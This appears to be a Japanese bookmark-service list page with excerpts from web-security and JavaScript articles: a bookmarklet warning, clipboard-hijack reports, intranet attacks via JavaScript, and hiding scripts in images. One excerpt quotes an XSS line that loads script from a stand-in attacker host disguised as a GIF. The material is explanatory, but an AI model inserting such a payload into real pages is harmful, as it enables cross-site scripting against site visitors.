高木浩光@自宅の日記 - 新はてなブックマークの登録ブックマークレットは使ってはいけない
はてなブックマーク(以下「はてブ」)がリニューアルされ、ブラウザからブックマークレットでブックマーク登録(以下「ブクマ登録」)しようとすると、図1の画面が現れるようになった。「こちらから再設定をお願いします」と指示されているが、この指示に従ってはいけない。ここで提供されている新型ブックマークレットは使ってはいけない。(この指示には従わなくてもブクマ登録はできる。) 新型ブックマークレットを使用すると図2の画面となる。ブクマ登録しようとしているWebサイト(通常、はてな以外のサイト)上に、はてブの画面のウィンドウが現れている。これは、Ajaxと共に近年よく使われるようになった「ページ内JavaScriptウィンドウ」である。(ポップアップウィンドウとは違い、ウィンドウをドラッグしてもブラウザの外に出すことはできず、あくまでも表示中のページ上のコンテンツであることがわかる。)
URLをコピペしたら悪質サイトに――乗っ取り被害が続出
クリップボード機能の乗っ取り被害の報告が相次いでいる。Windows、Macユーザーの両方が被害に遭っているもようだ。 どんなサイトのURLをコピーしても、悪質サイトのURLがペーストされてしまう――。テキストなどのコピー&ペーストに使われるメモリ領域「クリップボード」が乗っ取られる被害が続出している。被害報告はWindows、Macユーザーの両方から寄せられているという。セキュリティ企業の英Sophosが8月19日のブログで伝えた。 Sophosによると、ネットの掲示板には被害に遭ったというユーザーからの報告が相次いでいる。「URLを選択して“ctrlとc”でコピーし、ペーストしようとするたびに、ウイルスと思われるリンクが出てくる」「例えば、http://www.google.com/というURLをWindowsのクリップボードにコピーして、ペーストすると問題のURLになる。ウイルス対策
自サイトの画像の保存をプロテクションする仕組み:phpspot開発日誌
MooTools 1.2 Image Protector: dwProtector Image protection is a hot topic on the net these days, and why shouldn't it be? 自サイトの画像の保存をプロテクションする仕組み サイトの画像は、次の方法で保存できますが、それを全部禁止する方法です。 ・右クリック→名前をつけて保存 ・デスクトップにドラッグ&ドロップで保存 ・右クリックで名前をつけて背景を保存 ・背景画像を表示 dwProtect.js をダウンロードして、JavaScriptで以下のように書くだけです。 window.addEvent('domready', function() { var protector = new dwProtector({ image: '/blank.gif', elements:
[JS]クッキーを使用しないで、セッションデータを利用できるスクリプト
sessvars.jsは、ブラウザのクッキーを使用しないで、セッションデータを利用できるスクリプトです。 Session variables without cookies デモ sessvars.jsを使用することにより、クッキーをオフにしていたり、使用が禁止されている環境でもセッションデータを利用することができます。 ※スクリプトをオフの場合には利用できません。 格納できるデータの上限は、Opera9.5で2MB、IE7, Fx1.5/2, Safari3で10MBとなっています。 サイトに記載してある使用上の注意は、以下になります。 sessvars.jsは、JavaScriptのwindow.nameにデータを格納します。 これはクロスドメインのセキュリティ問題があるため、パスワードやクレジットカード番号などの重要な情報には利用しないでください。 しかし、ヘッダ情報でサーバーには送
JavaScriptを使ってイントラネット内を外から攻撃する方法:Geekなぺーじ
「Hacking Intranet Websites from the Outside」という講演が2006年にありました。 Black Hatでの講演です。 以下に説明する手法は既に公開されてある程度時間が経過している情報なので、ご存知の方にとっては既に古いとは思います。 詳細はプレゼン資料をご覧下さい。 概要 ファイアウォールなどに守られたイントラネットやホームネットワークの内部を攻撃する手法が解説してありました。 JavaScriptの基本仕様を組み合わせて情報を収集するというものでした。 最終的には、プリンタから印刷を行ったり、ルータの設定を変更するなどの攻撃が可能になるようです。 それ以外にも、Web経由で設定変更が出来るものは状況によっては影響されるかも知れません。 プレゼン後半ではCSRF(XSRF, cross-site request forgery)も解説されていました
[NS] お知らせ:「コナミコマンド」を実装しました
当サイトでは、本日よりコナミコマンドを実装いたしました。コマンドはファミコン版グラディウス準拠の「上上下下左右左右BA」です。SFC版グラディウスIIIのように自爆はしません。ご安心ください。 コマンドを打つとサイト全体がパワーアップします。もう一度コマンドを打つと元に戻ります。携帯電話やRSSリーダでご覧の場合は効果がありません。ご了承ください。 特に意味はありませんが、どうしようもなくコナミコマンドを打ちたくて打ちたくて仕方がなくなったときなどにご利用ください。料金は一切いただきません。 著作権を主張するようなモノでもないので、自分のサイトに付けたいと考えてらっしゃる奇特な方はソースを見て勝手にお持ち帰りください。 追記:うまくいかない方は日本語入力をオフにしてください。Windows版のInternetExplorer、Firefox、Operaそれぞれの最新版で動作確認済みです。
yohgaki's blog - 画像ファイルにJavaScriptを隠す
(Last Updated On: 2014年12月5日)前回のエントリでイメージファイルにスクリプトを埋め込んで攻撃する方法について記載しましたが、最近イメージファイルにスクリプトを埋め込む事例が話題になったためか ha.ckersにJavaScriptをイメージファイルに隠す方法が紹介されています。 http://ha.ckers.org/blog/20070623/hiding-js-in-valid-images/ <script src="http://cracked.example.com/cracked.gif"> などとXSS攻撃を拡張する手段に利用可能です。サンプルとしてFlickerにJavaScriptを埋め込んだイメージファイルがアップされています。 このイメージファイルは上手く細工しているので画像としても表示され、JavaScriptも実行できます。 Flicke
javascriptを多用したページを早く表示するには « ku
diggにのってた Vitamin Features » Serving JavaScript Fast っていう、Flickrの Cal Henderson というひとが書いてた記事に、最近なんとかなんないのかと思ってたことが書かれていて、すんげー!というわけですぐ試してみたら確かにその通りになって最高でした。 Serving JavaScript Fast ってなんのこと?というかんじだけど、要するにいまどきなWEBページはCSSとかjavascriptとかたくさん使っていて、ページのロードが完了するまで時間がかかるからなんとかしたいよね、という話。 CSSもjavascriptも一度読み込めばキャッシュされるからいいんじゃないの? たしかに。しかしブラウザは毎回更新されたかどうかを確認しに行って、更新されてない、という答えをもらってから自分が持っているキャッシュを使っているのです
TAKESAKO @ Yet another Cybozu Labs: Web2.0時代のAjax Binary Hacks
※公開用にいくつか手を加えてあります 前フリが長いとのツッコミがありましたので、今回の発表内容を少し要約してみたいと思います。 1. GIF Format Hacks (Server side) まずは、任意のpixelサイズ(幅・高さ)を持った画像ファイルを固定長の35byteで出力する方法 #!/usr/bin/perl use strict; use warnings; sub create_gif { my $size = pack "S2", @_; return "GIF89a$size\xf0\x00\x00\x00\x00\x00\xff\xff\xff," . "\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02L\x01\x00;"; } print "Content-Length: 35\n"; print "Content-Ty
Kazuho@Cybozu Labs Ajax な HTML ページのソースコードを表示する
« Japanize - 翻訳範囲の制御方法を検討中 | メイン | Japanize 拡張機能バージョンアップのおしらせ » 2006年10月02日 Ajax な HTML ページのソースコードを表示する 勢いだけで書く bookmarklet 第2弾です。 多くのウェブブラウザでは、メニューからウェブページのソースコードを表示することができます。しかし、この方法で表示される HTML はダウンロード時のデータなので、Ajax を多用しているウェブサイトのコードを解析する際には役にたちません。 Ajax により改変された、現在表示中の HTML のソースコードを確認するには、以下のようなブックマークレットを使うと便利です注。 javascript:void(window.open('', '', 'scrollbars=yes,dependent=yes').document.write
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
http://hp.vector.co.jp/authors/VA037394/develop/20040130.htm